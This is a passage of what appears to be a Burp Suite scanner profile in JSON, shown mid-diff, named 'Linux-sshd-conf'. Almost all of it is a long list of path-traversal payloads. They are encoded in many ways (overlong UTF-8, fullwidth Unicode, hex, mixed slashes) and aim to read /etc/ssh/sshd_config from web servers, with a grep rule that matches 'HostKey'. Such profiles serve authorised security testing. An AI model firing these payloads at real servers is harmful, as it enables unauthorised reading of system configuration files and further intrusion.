ff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\%uff0e%uff0e\\{FILE}","%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}","..0x2f{FILE}","..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}","0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}","0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}","..0x5c{FILE}","..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}","0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\0x2e0x2e\\{FILE}","0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}","..%c0%2f{FILE}","..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}","%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}","%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}","..%c0%5c{FILE}","..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}","%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\%c0%2e%c0%2e\\{FILE}","%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}","///%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}","\\\\\\%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","\\\\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}","..//{FILE}","..//..//{FILE}","..//..//..//{FILE}","..//..//..//..//{FILE}","..//..//..//..//..//{FILE}","..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//{FILE}","..//..//..//..//..//..//..//..//{FILE}","..///{FILE}","..///..///{FILE}","..///..///..///{FILE}","..///..///..///..///{FILE}","..///..///..///..///..///{FILE}","..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///{FILE}","..///..///..///..///..///..///..///..///{FILE}","..\\\\{FILE}","..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\{FILE}","..\\\\\\{FILE}","..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\..\\\\\\{FILE}","./\\/./{FILE}","./\\/././\\/./{FILE}","./\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}","./\\/././\\/././\\/././\\/././\\/././\\/././\\/././\\/./{FILE}",".\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}",".\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\.\\/\\.\\{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}","././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\{FILE}",".\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\.\\..\\..\\..\\..\\..\\..\\..\\..\\{FILE}","./../{FILE}","./.././../{FILE}","./.././.././../{FILE}","./.././.././.././../{FILE}","./.././.././.././.././../{FILE}","./.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././../{FILE}","./.././.././.././.././.././.././.././../{FILE}",".\\..\\{FILE}",".\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\.\\..\\{FILE}",".//..//{FILE}",".//..//.//..//{FILE}",".//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".//..//.//..//.//..//.//..//.//..//.//..//.//..//.//..//{FILE}",".\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}",".\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\.\\\\..\\\\{FILE}","../{FILE}","../..//{FILE}","../..//../{FILE}","../..//../..//{FILE}","../..//../..//../{FILE}","../..//../..//../..//{FILE}","../..//../..//../..//../{FILE}","../..//../..//../..//../..//{FILE}","..\\{FILE}","..\\..\\\\{FILE}","..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\{FILE}","..///{FILE}","../..///{FILE}","../..//..///{FILE}","../..//../..///{FILE}","../..//../..//..///{FILE}","../..//../..//../..///{FILE}","../..//../..//../..//..///{FILE}","../..//../..//../..//../..///{FILE}","..\\\\\\{FILE}","..\\..\\\\\\{FILE}","..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\\\\\{FILE}","..\\..\\\\..\\..\\\\..\\..\\\\..\\..\\\\\\{FILE}"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,HostKey"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Linux-sshd-conf","IssueSeverity":"Medium","IssueConfidence":"Certain","IssueDetail":"Linux-sshd-conf","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[{"type":"Payload","match":"{FILE}","replace":"etc/ssh/sshd_config","regex":"String"}],"VariationAttributes":[],"InsertionPointType":[18,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127,65,32,36,7,1,2,6,33,5,35,34,64,0,3,4,37,127],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Linux-sshd-conf", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@Sy3Omda", + "Payloads": [ + 